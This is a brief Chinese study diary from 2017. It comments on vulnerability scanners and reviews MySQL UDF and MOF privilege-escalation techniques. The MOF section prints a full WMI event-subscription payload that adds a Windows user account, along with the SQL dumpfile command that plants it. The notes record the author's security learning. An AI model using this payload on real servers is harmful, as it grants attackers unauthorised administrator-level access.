2017/05/01

假期都比较混

0x00 关于漏洞扫描(又是用了大量时间)

  • 工具例如awvs,好像挺强大,但是我没怎么用它找到过漏洞。扫了一晚上,起来发现两个高危(vulnerable javascript library),查了一圈,好像是说可以定义为敏感信息泄露,但是没啥利用价值(现在先这么说)
  • 工具例如brutexss,也是没啥大用(一个我发现的漏洞都检测不出),最重要的在我看来还是payload的量,扫描器代码作为小型的应该没有多大差距

0x01 MySQL提权之UDF提权

晚上复习了一下UDF提权
UDF的表现形式都是以dll形成mysql的插件

数据库版本为 5.0 以下的:
如果是 win2000 的服务器,则需要将 udf.dll 文件导出到 C:\Winnt\udf.dll 下。
如果是 win2003 服务器,则要将 udf.dll 文件导出在 C:\Windows\udf.dll 下。

数据库版本为 5.1 以上的:
需要将 dll 文件导出到 mysql 安装目录的 lib\plugin\ 下,才能创建自定义函数。如果没有 plugin 目录,需要进行手动创建

select @@basedir;    # 显示mysql路径

0x02 MySQL提权之MOF提权

又复习了下MOF提权
利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,写入cmd命令执行

#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name  = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText =
    "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user [username] [password] /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
select load_file('C:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'

0x03 FLAG

两天内写个iptables设置防火墙docker实现(->在这里<-)

你可能感兴趣的:(2017/05/01)